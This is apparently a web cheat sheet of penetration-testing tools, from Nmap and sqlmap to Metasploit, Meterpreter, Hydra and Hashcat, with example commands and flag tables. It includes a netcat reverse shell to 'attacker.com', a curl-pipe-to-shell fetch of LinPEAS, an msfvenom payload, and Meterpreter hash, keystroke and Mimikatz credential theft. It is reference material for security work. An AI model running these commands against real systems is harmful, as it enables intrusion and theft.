🔎 No tools found. Press Escape to clear search.
Recon
5 tools
01
Nmap (Network Mapper)
Both
Network
FREE
What It Does
The industry-standard port scanner. Used for host discovery, port scanning, service/version detection, OS fingerprinting, and NSE scripts.
Install
sudo apt install nmapbrew install nmap
Commands & Examples
// Basic host scan — Quick ping + top 1000 ports
nmap 192.168.1.10
// Full port scan — Scan all 65535 ports
nmap -p- 192.168.1.10
// Service + version — Detect service versions on open ports
nmap -sV 192.168.1.10
// OS detection — Identify operating system (requires root)
nmap -O 192.168.1.10
// Aggressive scan — -A = OS detection + version + scripts + traceroute
nmap -A 192.168.1.10
// Stealth SYN scan — Half-open scan, less likely to be logged
nmap -sS 192.168.1.10
// UDP scan — Scan common UDP ports
nmap -sU -p 53,161,162 192.168.1.10
// Skip ping / bypass ICMP block — -Pn = treat host as up even if ICMP blocked
nmap -Pn -sV -p- 192.168.1.10
// Timing control — T0=paranoid T2=polite T4=aggressive T5=insane
nmap -T2 192.168.1.10
// WAF / firewall bypass — -sN=null scan (no TCP flags) bypasses some stateless FWs
nmap -Pn -sN -T2 192.168.1.10
// Run vuln scripts — NSE vulnerability detection scripts
nmap --script vuln 192.168.1.10
// Banner grab — Grab service banners
nmap --script banner -p 21,22,80 192.168.1.10
// SMB enumeration — Enumerate SMB
nmap --script smb-enum-shares,smb-enum-users -p 445 192.168.1.10
// Save all formats — -oA outputs .nmap / .xml / .gnmap simultaneously
nmap -oA scan_output 192.168.1.10
// Ping sweep (live hosts) — -sn = host discovery only, no port scan
nmap -sn 192.168.1.0/24
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -Pn | No ping — Skip host discovery — useful when ICMP is blocked by firewall |
| -sV | Version scan — Detect version of running services |
| -sS | SYN scan — Stealth scan — sends SYN, never completes handshake |
| -sN | Null scan — No TCP flags set — can bypass some stateless firewalls |
| -sU | UDP scan — Scan UDP ports — slower but finds DNS/SNMP/TFTP |
| -O | OS detection — Guess OS based on TCP/IP stack behavior |
| -A | Aggressive — OS + version + scripts + traceroute combined |
| -p- | All ports — Scan all 65535 ports instead of top 1000 |
| -T[0-5] | Timing template — Speed: T0=slowest/stealthy, T5=fastest/loud |
| --script | NSE scripts — Run Nmap Scripting Engine scripts |
| -oA | All output — Save .nmap .xml .gnmap formats at once |
| -sn | Ping sweep — Discover live hosts, skip port scanning |
References
02
Masscan (Mass IP Port Scanner)
Active
Network
FREE
What It Does
Fastest port scanner — can scan the entire internet in minutes. Ideal for large CIDR ranges. Syntax is Nmap-like but much faster.
Install
sudo apt install masscangit clone https://github.com/robertdavidgraham/masscan && cd masscan && make
Commands & Examples
// Basic subnet scan — Scan subnet for HTTP/HTTPS
masscan 192.168.1.0/24 -p 80,443
// Full port range — 100k packets/sec on entire range
masscan 10.0.0.0/8 -p 0-65535 --rate 100000
// Top 1000 ports — First 1000 ports
masscan 192.168.1.10 -p 1-1000 --rate 1000
// Output to file — Save to list format
masscan 192.168.1.0/24 -p 443 -oL output.txt
// Banner grab — Grab HTTP banners
masscan 192.168.1.10 -p 80 --banners
// Exclude hosts — Skip specific host
masscan 10.0.0.0/8 -p 80 --exclude 10.0.0.1
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| --rate | Packets/sec — Transmission rate. Default=low. 10000=fast. 100000=very fast |
| -p | Ports — Target ports: -p 80,443 / -p 1-1000 / -p 0-65535 |
| -oL | List output — Save results in list format |
| --banners | Banner grab — Attempt to pull service banners |
| --exclude | Exclude IPs — Skip specified hosts |
References
03
Subfinder (Subdomain Discovery Tool)
Passive
Web
FREE
What It Does
Fast passive subdomain enumeration using 50+ data sources: crt.sh, virustotal, chaos, shodan, alienvault. Essential first step in web recon.
Install
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latestsudo apt install subfinder
Commands & Examples
// Basic enum — Enumerate subdomains passively
subfinder -d target.com
// Save output — Write results to file
subfinder -d target.com -o subs.txt
// All sources — Use every available source
subfinder -d target.com -all
// Silent output — Only subdomains, no banner (for piping)
subfinder -d target.com -silent
// Multiple domains — Scan a list of domains
subfinder -dL domains.txt -o subs.txt
// Recursive — Find subdomains of subdomains
subfinder -d target.com -recursive
// Pipe to httpx — Full pipeline
subfinder -d target.com -silent | httpx -status-code -title
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -d | Domain — Target domain |
| -dL | Domain list — File with multiple domains |
| -o | Output — Save to file |
| -all | All sources — Use all passive sources |
| -silent | Silent — Subdomain-only output for piping |
| -recursive | Recursive — Enumerate sub-subdomains |
References
04
Amass (Attack Surface Mapping)
Both
Web
FREE
What It Does
OWASP's comprehensive subdomain + attack surface mapping tool. Combines passive sources, DNS brute-force, certificate transparency, and web archives.
Install
go install -v github.com/owasp-amass/amass/v4/...@mastersudo apt install amass
Commands & Examples
// Passive only — No DNS probing, passive sources only
amass enum -passive -d target.com
// Active enum — Active DNS probing + passive
amass enum -active -d target.com
// Brute force — DNS brute force with wordlist
amass enum -brute -d target.com -w subdomains.txt
// Save output — Write to file
amass enum -d target.com -o subs.txt
// Intel phase — Collect ASN / CIDR / related domains
amass intel -whois -d target.com
// With IP — Include resolved IP addresses
amass enum -d target.com -ip
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -passive | Passive only — External APIs, no DNS queries |
| -active | Active — DNS queries + zone transfers |
| -brute | Brute force — Dictionary-based DNS enumeration |
| -w | Wordlist — Custom subdomain wordlist |
| -ip | Show IPs — Include IP addresses in output |
| -o | Output — Save to file |
References
05
httpx (Fast HTTP Probing)
Active
Web
FREE
What It Does
Takes a list of subdomains and probes for live HTTP/HTTPS services. Returns status codes, titles, technologies, server headers. Essential pipeline step.
Install
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
Commands & Examples
// Basic probe — Check which subdomains are alive
httpx -l subs.txt
// Status + title — Show HTTP status and page title
httpx -l subs.txt -status-code -title
// Tech detection — Detect CMS, frameworks, WAF
httpx -l subs.txt -tech-detect
// Full recon — Full info per host
httpx -l subs.txt -status-code -title -tech-detect -server
// Screenshots — Take screenshot of each host
httpx -l subs.txt -screenshot
// JSON output — JSON format for processing
httpx -l subs.txt -json -o live.json
// Full pipeline — One-liner
subfinder -d target.com -silent | httpx -status-code -title -tech-detect
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -l | Input list — File of hosts to probe |
| -status-code | Status code — Show HTTP status |
| -title | Page title — Extract HTML title |
| -tech-detect | Technology — Identify CMS / framework / WAF |
| -server | Server header — Show Server response header |
| -screenshot | Screenshot — Capture visual screenshot |
| -json | JSON output — Structured JSON for parsing |
References
Web Testing
6 tools
06
Burp Suite (Web Security Testing Platform)
Both
Web
FREE
What It Does
Most-used web security testing platform. Intercepts HTTP/HTTPS, modifies requests, scans for vulns, and provides tools for manual and automated web testing.
Install
https://portswigger.net/burp/communitydownload (Community = free)
Commands & Examples
// Proxy setup — Route all browser traffic through Burp
Set browser proxy: 127.0.0.1:8080
// Install CA cert — Required for HTTPS interception
Browse to http://burp then download CA cert
// Send to Intruder — Brute force / fuzzing
Right-click request > Send to Intruder > set positions > load wordlist > Attack
// Send to Repeater — Manually replay and modify requests
Right-click > Send to Repeater > Ctrl+R
// Burp Collaborator — Detect blind SSRF / XXE / OOB SQLi
Use Collaborator payload in injection points
// Match and Replace — Auto-modify all passing requests/responses
Proxy > Options > Match and Replace
// Turbo Intruder — High-speed fuzzing and race conditions
Extensions > BApp Store > Turbo Intruder
// Active scan (Pro) — Automated vuln discovery (Pro only)
Right-click > Scan > Active scan
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| Scope | Target scope — Define which hosts Burp focuses on in Target > Scope |
| Intercept | On/Off — Toggle request interception in Proxy tab |
| Intruder positions | Mark §§ — Mark injection points with § delimiters |
| Attack types | Sniper/Pitchfork/Cluster bomb — Different payload combination modes |
| Grep Match | Response match — Flag responses containing specific strings |
References
07
ffuf (Fuzz Faster U Fool)
Active
Web
FREE
What It Does
Blazing-fast web fuzzer for directory busting, parameter discovery, subdomain enumeration, and virtual host discovery. Highly customizable.
Install
go install github.com/ffuf/ffuf/v2@latestsudo apt install ffuf
Commands & Examples
// Directory fuzz — Fuzz directories
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt
// File extensions — Add extensions
ffuf -u https://target.com/FUZZ -w wordlist.txt -e .php,.txt,.bak
// Filter 404s — -fc = filter status code
-fc 404 flag: ffuf -u https://target.com/FUZZ -w wordlist.txt -fc 404
// POST fuzzing — Fuzz POST param
ffuf -u https://target.com/login -X POST -d 'user=FUZZ&pass=test' -w users.txt
// Header fuzzing — Fuzz HTTP headers
ffuf -u https://target.com/ -H 'X-Forwarded-For: FUZZ' -w ips.txt
// VHost enum — Virtual host discovery
ffuf -u https://FUZZ.target.com -H 'Host: FUZZ.target.com' -w subs.txt
// Rate limit — Limit request rate
ffuf -u https://target.com/FUZZ -w wordlist.txt -rate 50
// Recursive — Recurse into dirs
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -u | URL — Target URL. FUZZ = injection point |
| -w | Wordlist — Path to wordlist file |
| -fc | Filter code — Hide responses with this status code |
| -mc | Match code — Only show these status codes |
| -fs | Filter size — Hide responses of this byte size |
| -e | Extensions — Append: -e .php,.html,.bak |
| -X | Method — HTTP method: POST, PUT, DELETE |
| -d | POST data — Request body data |
| -H | Header — Custom header: -H 'Authorization: Bearer TOKEN' |
| -rate | Rate — Max requests per second |
| -recursion | Recurse — Auto-recurse into found directories |
References
08
sqlmap (Automatic SQL Injection)
Active
Web
FREE
What It Does
Fully automated SQL injection detection and exploitation. Supports MySQL, MSSQL, PostgreSQL, Oracle, SQLite. Can dump DBs, read/write files, get OS shell.
Install
sudo apt install sqlmapgit clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
Commands & Examples
// Test single URL — Test URL parameter for SQLi
sqlmap -u 'https://target.com/item?id=1'
// List databases — Enumerate all databases
sqlmap -u 'https://target.com/item?id=1' --dbs
// List tables — Tables in a DB
sqlmap -u 'https://target.com/item?id=1' -D dbname --tables
// Dump table — Dump full table
sqlmap -u 'https://target.com/item?id=1' -D dbname -T users --dump
// From Burp request — Load saved Burp request file
sqlmap -r request.txt --level=5 --risk=3
// POST parameter — Test POST param
sqlmap -u 'https://target.com/login' --data='user=a&pass=b' -p user
// Cookie injection — Inject via cookie
sqlmap -u 'https://target.com/' --cookie='sess=INJECT' -p sess
// WAF bypass — Use tamper scripts
sqlmap -u 'https://target.com/?id=1' --tamper=space2comment,randomcase
// Batch mode — Auto-answer all prompts
sqlmap -u 'https://target.com/?id=1' --batch --dbs
// OS shell — Attempt OS command execution
sqlmap -u 'https://target.com/?id=1' --os-shell
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -u | URL — Target URL with parameter |
| -r | Request file — Raw HTTP request from Burp |
| -p | Parameter — Which parameter to test |
| --data | POST body — POST request body |
| --dbs | List DBs — Enumerate all databases |
| -D / -T | DB/Table — Target specific database and table |
| --dump | Dump data — Extract table records |
| --level | Test depth — 1-5: higher = test more vectors (cookies at 3+) |
| --risk | Risk level — 1-3: higher = more destructive payloads |
| --tamper | WAF bypass — Obfuscation scripts: space2comment, randomcase, etc. |
| --batch | No prompts — Accept all defaults without interaction |
References
09
Nuclei (Template-Based Vulnerability Scanner)
Active
Web
FREE
What It Does
Fast vulnerability scanner using 7000+ YAML community templates. Covers CVEs, misconfigs, exposed panels, and tech detection. Fits perfectly in recon pipelines.
Install
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latestnuclei -update-templates
Commands & Examples
// Scan single URL — Run all default templates
nuclei -u https://target.com
// From list — Scan URLs from file
nuclei -l urls.txt
// By severity — Only critical and high severity
nuclei -u https://target.com -s critical,high
// By tags — Templates matching these tags
nuclei -u https://target.com -tags cve,sqli,xss
// Specific CVE — Single CVE check
nuclei -u https://target.com -t cves/2021/CVE-2021-44228.yaml
// Misconfig scan — Misconfiguration templates
nuclei -u https://target.com -t misconfiguration/
// Exposures scan — Exposed files and admin panels
nuclei -u https://target.com -t exposures/
// Tech detection — Fingerprint tech stack
nuclei -u https://target.com -t technologies/
// Full pipeline — Complete recon chain
subfinder -d target.com -silent | httpx -silent | nuclei -t cves/
// Rate control — -c = concurrency, -rate-limit = req/sec
nuclei -l urls.txt -rate-limit 50 -c 10
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -u | URL — Single target URL |
| -l | URL list — File of URLs |
| -t | Templates — Template path or directory |
| -s | Severity — info / low / medium / high / critical |
| -tags | Tags — Filter by template tags |
| -c | Concurrency — Parallel goroutines |
| -rate-limit | Rate — Max requests per second |
| -j | JSON output — Output in JSON format |
| -update-templates | Update — Download latest templates |
References
10
dalfox (XSS Parameter Scanner)
Active
Web
FREE
What It Does
Fast XSS scanner with smart payload selection, WAF detection, and DOM analysis. Tests reflected, DOM, and blind XSS.
Install
go install github.com/hahwul/dalfox/v2@latest
Commands & Examples
// Scan URL — Scan URL for XSS
dalfox url 'https://target.com/search?q=test'
// From file — Scan URLs from file
dalfox file urls.txt
// Pipe mode — Accept from stdin
echo 'https://target.com/?q=test' | dalfox pipe
// Blind XSS — Blind XSS callback
dalfox url 'https://target.com/?q=test' -b 'https://xsshunter.com/x'
// WAF bypass — WAF evasion mode
dalfox url 'https://target.com/?q=test' --waf-evasion
// Custom payload — Custom payload file
dalfox url 'https://target.com/?q=test' --custom-payload pl.txt
// With headers — Authenticated request
dalfox url 'https://target.com/' -H 'Cookie: session=abc'
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -b | Blind callback — URL for blind XSS callback notification |
| -H | Header — Custom HTTP header |
| --waf-evasion | WAF bypass — Enable WAF evasion techniques |
| --custom-payload | Payload file — Custom XSS payload list |
| --only-discovery | Discovery only — Find parameters, no injection |
References
11
Nikto (Web Server Vulnerability Scanner)
Active
Web
FREE
What It Does
Checks for dangerous files, outdated software, version-specific issues, and misconfigurations. Fast first-pass web server scanner.
Install
sudo apt install nikto
Commands & Examples
// Basic scan — Full default scan
nikto -h https://target.com
// Custom port — Scan non-standard port
nikto -h target.com -p 8080
// Force SSL — Force HTTPS
nikto -h target.com -ssl
// With auth — HTTP basic auth
nikto -h target.com -id admin:password
// HTML report — Save HTML report
nikto -h target.com -o report.html -Format html
// Via Burp proxy — Route through Burp
nikto -h target.com -useproxy http://127.0.0.1:8080
// IDS evasion — URL encoding to evade IDS
nikto -h target.com -evasion 1
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -h | Host — Target hostname or IP |
| -p | Port — Override default port |
| -ssl | SSL — Force HTTPS mode |
| -id | Auth — HTTP basic auth user:pass |
| -Format | Output format — csv / html / txt / xml |
| -evasion | IDS bypass — Encoding technique to avoid detection |
| -useproxy | Proxy — Route through proxy (Burp) |
References
Network
3 tools
12
Wireshark / tshark (Network Protocol Analyzer)
Passive
Network
FREE
What It Does
Capture and inspect network traffic in real-time or from PCAP files. Essential for protocol analysis, credential sniffing, and traffic reconstruction.
Install
sudo apt install wireshark tsharkhttps://www.wireshark.org/download.html
Commands & Examples
// Capture on interface — Start live GUI capture
wireshark -i eth0
// Capture to file — Save packets to PCAP
wireshark -i eth0 -w capture.pcap
// tshark capture — CLI capture mode
tshark -i eth0
// tshark filter — Apply display filter
tshark -i eth0 -Y 'http.request'
// Extract HTTP URIs — Pull all requested URIs
tshark -r cap.pcap -Y 'http' -T fields -e http.request.uri
// Extract credentials — Find HTTP basic auth
tshark -r cap.pcap -Y 'http.authbasic'
// Follow TCP stream — Reconstruct full conversation
GUI: right-click packet > Follow > TCP Stream
// Filter by IP — Traffic to/from specific IP
tshark -i eth0 -Y 'ip.addr == 192.168.1.10'
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -i | Interface — Network interface to capture on |
| -w | Write PCAP — Save packets to file |
| -r | Read PCAP — Load existing capture file |
| -Y | Display filter — Wireshark filter expression |
| -T fields | Field output — Output specific protocol fields |
| -e | Field name — Field to extract in -T fields mode |
| -f | Capture filter — BPF filter: -f 'port 80' |
References
13
netcat (nc) (TCP/UDP Swiss Army Knife)
Both
Network
FREE
What It Does
Most versatile networking tool. Port scanning, banner grabbing, file transfer, reverse shells, bind shells, and network debugging.
Install
sudo apt install netcat-openbsd(pre-installed on most Linux)
Commands & Examples
// Connect to port — Open TCP connection
nc 192.168.1.10 80
// Banner grab — -v = verbose, shows service banner
nc -v 192.168.1.10 22
// Port scan — -z = scan mode only, no data sent
nc -zv 192.168.1.10 1-1000
// Listen for shell — Start listener to catch reverse shell
nc -lvnp 4444
// Reverse shell (victim) — Victim connects back with shell
nc attacker.com 4444 -e /bin/bash
// File transfer (receive) — Receive file on attacker
nc -lvnp 9999 > received.file
// File transfer (send) — Send file to listener
nc 192.168.1.10 9999 < file.txt
// HTTP request — Manual HTTP request
echo -e 'GET / HTTP/1.0\r\n\r\n' | nc target.com 80
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -l | Listen — Listen for incoming connections |
| -v | Verbose — Show connection info |
| -n | No DNS — Skip DNS resolution (faster) |
| -p | Port — Local port to listen on |
| -z | Zero I/O — Scan mode — just check if port is open |
| -u | UDP — Use UDP instead of TCP |
| -e | Execute — Execute program after connect (may be disabled) |
References
14
enum4linux (SMB/Windows Enumeration)
Active
Network
FREE
What It Does
Enumerates users, groups, shares, and password policy from Windows/Samba systems via SMB ports 139/445.
Install
sudo apt install enum4linuxhttps://github.com/cddmp/enum4linux-ng (newer version)
Commands & Examples
// All checks — -a = run all enumeration
enum4linux -a 192.168.1.10
// Users only — Enumerate users via RPC
enum4linux -U 192.168.1.10
// Shares only — List SMB shares
enum4linux -S 192.168.1.10
// Password policy — Get account lockout policy
enum4linux -P 192.168.1.10
// With credentials — Authenticated enumeration
enum4linux -u admin -p pass 192.168.1.10
// enum4linux-ng — Modern version with better output
enum4linux-ng -A 192.168.1.10
// Nmap alternative — Via Nmap NSE
nmap --script smb-enum-users,smb-enum-shares -p 445 192.168.1.10
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -a | All checks — Run all enumeration modules |
| -U | Users — Enumerate users via RPC null session |
| -S | Shares — List accessible SMB shares |
| -P | Password policy — Extract account policy |
| -G | Groups — Enumerate local groups |
| -u/-p | Credentials — Authenticate before enumeration |
References
OSINT
3 tools
15
theHarvester (Email and Subdomain Harvester)
Passive
OSINT
FREE
What It Does
Gathers emails, subdomains, employee names from Google, Bing, LinkedIn, Shodan, crt.sh, Hunter.io and 20+ more sources.
Install
sudo apt install theharvestergit clone https://github.com/laramies/theHarvester && pip3 install -r requirements/base.txt
Commands & Examples
// Google search — Search Google for emails/subdomains
theHarvester -d target.com -b google
// All sources — Use every available source
theHarvester -d target.com -b all
// Limit results — Limit to 200 results
theHarvester -d target.com -b bing -l 200
// LinkedIn names — Find employee names
theHarvester -d target.com -b linkedin
// Shodan results — Include Shodan data (needs API key)
theHarvester -d target.com -b shodan
// HTML report — Save HTML and XML report
theHarvester -d target.com -b all -f report
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -d | Domain — Target domain |
| -b | Source — Data source: google/bing/linkedin/shodan/all |
| -l | Limit — Max results per source |
| -f | Output file — Save HTML/XML report (no extension) |
References
16
Sherlock (Username Cross-Platform Hunt)
Passive
OSINT
FREE
What It Does
Searches a username across 300+ social media and tech platforms. One username reveals all linked accounts instantly.
Install
pip3 install sherlock-projectgit clone https://github.com/sherlock-project/sherlock
Commands & Examples
// Single username — Search all platforms
sherlock username
// Multiple usernames — Check multiple at once
sherlock user1 user2 user3
// Print found only — Only show platforms where found
sherlock username --print-found
// CSV export — Save as CSV
sherlock username --csv
// With timeout — Request timeout in seconds
sherlock username --timeout 10
// Via Tor — Route through Tor network
sherlock username --tor
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| --print-found | Found only — Output only confirmed accounts |
| --csv | CSV output — Save to CSV file |
| --timeout | Timeout — Per-request timeout seconds |
| --tor | Tor — Route via Tor for anonymity |
References
17
Recon-ng (Web Recon Framework)
Passive
OSINT
FREE
What It Does
Modular OSINT framework. Modules for domain recon, email harvesting, breach lookup, contact discovery. Similar to Metasploit in structure.
Install
sudo apt install recon-ng
Commands & Examples
// Start — Launch the framework
recon-ng
// Create workspace — Separate environment per engagement
workspaces create target_name
// Add domain — Seed the database
db insert domains target.com
// Search modules — Find available modules
marketplace search
// Install module — Install from marketplace
marketplace install recon/domains-hosts/hackertarget
// Load module — Load installed module
modules load recon/domains-hosts/hackertarget
// Set target — Configure source
options set SOURCE target.com
// Run — Execute loaded module
run
// Show results — View discovered hosts
show hosts
// HTML report — Generate HTML report
modules load reporting/html && run
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| workspaces | Workspace — Isolate recon per target |
| marketplace | Module store — Online module repository |
| db insert | Seed DB — Add known targets to DB |
| options set | Configure — Set module parameters |
References
Exploitation
3 tools
18
Metasploit Framework (Exploitation Platform)
Active
Network
FREE
What It Does
World's most used penetration testing framework. Exploit modules, payloads, auxiliaries, and post-exploitation for every platform and service.
Install
sudo apt install metasploit-frameworkhttps://metasploit.com/download
Commands & Examples
// Start console — Launch Metasploit
msfconsole
// Search exploits — Find Windows SMB exploits
search type:exploit platform:windows smb
// EternalBlue — Load MS17-010 exploit
use exploit/windows/smb/ms17_010_eternalblue
// Show options — Display required settings
show options
// Set target — Set target host(s)
set RHOSTS 192.168.1.10
// Set attacker IP — Your IP for reverse shell
set LHOST 192.168.1.5
// Set payload — Reverse Meterpreter payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
// Run — Execute exploit
run
// DB + Nmap — Store Nmap results in MSF DB
db_nmap -sV 192.168.1.0/24
// List sessions — List all active sessions
sessions -l
// Interact session — Open session 1
sessions -i 1
// Generate payload — Standalone payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f exe -o shell.exe
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| search | Find modules — Search by name, platform, CVE |
| use | Load module — Load an exploit/payload/auxiliary |
| set | Configure — Set module option |
| RHOSTS | Target — Remote host(s) to attack |
| LHOST | Local IP — Attacker IP for reverse shell |
| LPORT | Local port — Attacker port for reverse connection |
| sessions | Manage shells — List and interact with sessions |
References
19
commix (Command Injection Exploiter)
Active
Web
FREE
What It Does
Automated OS command injection detection and exploitation for web applications.
Install
sudo apt install commix
Commands & Examples
// Test GET param — Test GET parameter
commix --url='https://target.com/?host=INJECT'
// Test POST param — Test POST param
commix --url='https://target.com/ping' --data='host=INJECT'
// From Burp request — Load Burp request file
commix -r request.txt
// Get OS shell — Spawn interactive shell
commix --url='https://target.com/?h=test' --os-shell
// Increase level — More aggressive detection
commix --url='https://target.com/?q=test' --level=3
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| --url | URL — Target URL with INJECT marker |
| --data | POST data — POST body parameters |
| -r | Request file — Load raw Burp request |
| --os-shell | OS shell — Spawn interactive command shell |
| --level | Level — Detection aggression 1-3 |
References
20
XSStrike (Advanced XSS Detection Suite)
Active
Web
FREE
What It Does
Context-aware XSS scanner with DOM parsing and WAF detection. Generates smarter payloads than basic scanners.
Install
git clone https://github.com/s0md3v/XSStrike && pip3 install -r requirements.txt
Commands & Examples
// Scan URL — Test URL for XSS
python3 xsstrike.py -u 'https://target.com/?q=test'
// POST data — POST parameter
python3 xsstrike.py -u 'https://target.com/search' --data 'q=test'
// DOM scan — DOM-based XSS
python3 xsstrike.py -u 'https://target.com/' --dom
// Crawl + scan — Crawl and test all params
python3 xsstrike.py -u 'https://target.com/' --crawl
// Blind XSS — Blind/stored XSS
python3 xsstrike.py -u 'https://target.com/?q=test' --blind
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -u | URL — Target URL |
| --data | POST data — POST body |
| --dom | DOM scan — DOM-based XSS analysis |
| --crawl | Crawl — Crawl entire website |
| --blind | Blind XSS — Test for stored/blind XSS |
References
Post-Exploitation
2 tools
21
Meterpreter (Advanced In-Memory Shell)
Active
Network
FREE
What It Does
Metasploit's advanced post-exploitation shell. Runs in RAM only (no disk footprint), provides file system, privileges, pivoting, keylogging and more.
Install
Part of Metasploit — use msfvenom to generate stagerSet handler: use exploit/multi/handler
Commands & Examples
// System info — OS, hostname, architecture, domain
sysinfo
// Current user — Show current user context
getuid
// Current privileges — List held Windows privileges
getprivs
// Escalate to SYSTEM — Try 4 escalation techniques automatically
getsystem
// Dump NTLM hashes — Extract local account hashes (needs SYSTEM)
hashdump
// Process list — Show all running processes
ps
// Migrate process — Move into PID 1234 (lsass/explorer for stability)
migrate 1234
// Upload file — Upload file to target
upload /local/nc.exe C:\\Windows\\Temp\\
// Download file — Download from target
download C:\\Users\\user\\passwords.txt
// Get shell — Drop to native OS command prompt
shell
// Take screenshot — Capture target desktop
screenshot
// Start keylogger — Begin capturing keystrokes
keyscan_start
// Dump keystrokes — Print captured keys
keyscan_dump
// Port forward — Tunnel to internal host
portfwd add -l 8080 -p 80 -r 192.168.2.10
// Pivot routing — Route MSF traffic through this session
route add 192.168.2.0/24 1
// Load Kiwi/Mimikatz — Dump Windows credentials
load kiwi && creds_all
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| getsystem | Privilege esc — Named pipe / token duplication / RPCSS methods |
| hashdump | Hash dump — Dumps SAM hashes — requires SYSTEM + lsass migration |
| migrate | Migrate — Move payload into stable process |
| portfwd | Port forward — Create tunnels to internal targets |
| route | Pivot — Route Metasploit traffic through session |
| load kiwi | Mimikatz — Load Kiwi for plaintext credential attacks |
References
22
LinPEAS / WinPEAS (Privilege Escalation Scripts)
Active
Network
FREE
What It Does
Automated local privilege escalation enumeration. LinPEAS for Linux, WinPEAS for Windows. Checks SUID, cron, writable paths, weak services, stored credentials.
Install
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.shiwr https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEAS.exe -OutFile wp.exe
Commands & Examples
// Run from internet — Run LinPEAS without saving to disk
curl -L https://linpeas.sh | sh
// Run from disk — Execute after upload
chmod +x linpeas.sh && ./linpeas.sh
// Run WinPEAS — Windows privilege escalation check
.\winpeas.exe
// Save output — Display + save results
./linpeas.sh 2>&1 | tee linpeas_output.txt
// Via Meterpreter — Upload and execute via MSF
upload linpeas.sh /tmp/ && shell
// Quiet mode — Less verbose — only important findings
./linpeas.sh -q
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -q | Quiet — Reduce noise, show only interesting results |
| -a | All checks — Include slow/thorough checks |
| 2>&1 | Redirect stderr — Capture all output including errors |
| | tee | Tee output — Display AND save simultaneously |
References
Password
3 tools
23
Hydra (Network Login Brute Forcer)
Active
Network
FREE
What It Does
Fast and flexible online password brute-force tool. Supports 50+ protocols: SSH, HTTP, FTP, RDP, SMB, SMTP, MySQL and more.
Install
sudo apt install hydra
Commands & Examples
// SSH brute force — Brute force SSH login
hydra -l admin -P rockyou.txt ssh://192.168.1.10
// HTTP POST form — Web login form
hydra -L users.txt -P pass.txt target.com http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'
// HTTP GET form — GET-based login
hydra -l admin -P pass.txt target.com http-get-form '/login:user=^USER^&pass=^PASS^:F=error'
// FTP brute force — FTP authentication
hydra -l admin -P rockyou.txt ftp://192.168.1.10
// RDP brute force — Windows RDP
hydra -l administrator -P pass.txt rdp://192.168.1.10
// Stop on success — -f = stop after first found cred
hydra -l admin -P pass.txt -f ssh://192.168.1.10
// Thread control — -t = threads (default 16)
hydra -t 4 -l admin -P pass.txt ssh://192.168.1.10
// Verbose mode — -V = show every attempt
hydra -V -l admin -P pass.txt ssh://192.168.1.10
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -l | Single user — One username |
| -L | User list — File of usernames |
| -p | Single pass — Single password |
| -P | Password list — Password wordlist (rockyou.txt) |
| -f | Stop on first — Stop after first valid credential |
| -V | Verbose — Show every attempt |
| -t | Threads — Concurrent tasks (default 16) |
| -e nsr | Extra checks — n=empty pass, s=same as user, r=reversed user |
| ^USER^ | Username pos — Placeholder in form string |
| ^PASS^ | Password pos — Placeholder in form string |
References
24
Hashcat (GPU-Accelerated Hash Cracker)
Active
Password
FREE
What It Does
World's fastest password cracker using GPU acceleration. Supports 300+ hash types: MD5, SHA1, NTLM, bcrypt, WPA2, JWT HMAC.
Install
sudo apt install hashcathttps://hashcat.net/hashcat/
Commands & Examples
// Identify hash type — Auto-detect hash format
hashcat --identify hash.txt
// MD5 dictionary — -m 0 = MD5, wordlist attack
hashcat -m 0 hash.txt rockyou.txt
// NTLM crack — -m 1000 = Windows NTLM hash
hashcat -m 1000 ntlm.txt rockyou.txt
// SHA256 crack — -m 1400 = SHA-256
hashcat -m 1400 sha256.txt rockyou.txt
// Brute force 6 chars — -a 3 = mask/brute-force attack
hashcat -m 0 hash.txt -a 3 ?a?a?a?a?a?a
// Rules attack — Word transformation rules
hashcat -m 0 hash.txt rockyou.txt -r best64.rule
// WPA2 crack — Crack captured WPA2 handshake
hashcat -m 22000 capture.hc22000 rockyou.txt
// JWT secret crack — Crack JWT HMAC-SHA256 secret
hashcat -a 0 -m 16500 jwt.txt wordlist.txt
// Show cracked — Display results from potfile
hashcat -m 0 hash.txt rockyou.txt --show
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -m | Hash mode — Hash type: 0=MD5 1000=NTLM 1800=sha512crypt 3200=bcrypt |
| -a | Attack mode — 0=dict 1=combinator 3=brute-force 6=hybrid |
| -r | Rules — Word mangling rules file |
| --show | Show — Print cracked passwords from potfile |
| ?a ?l ?u ?d | Mask charset — ?l=lower ?u=upper ?d=digit ?s=special ?a=all |
| -w | Workload — 1=low 2=default 3=high 4=max (GPU intensive) |
References
25
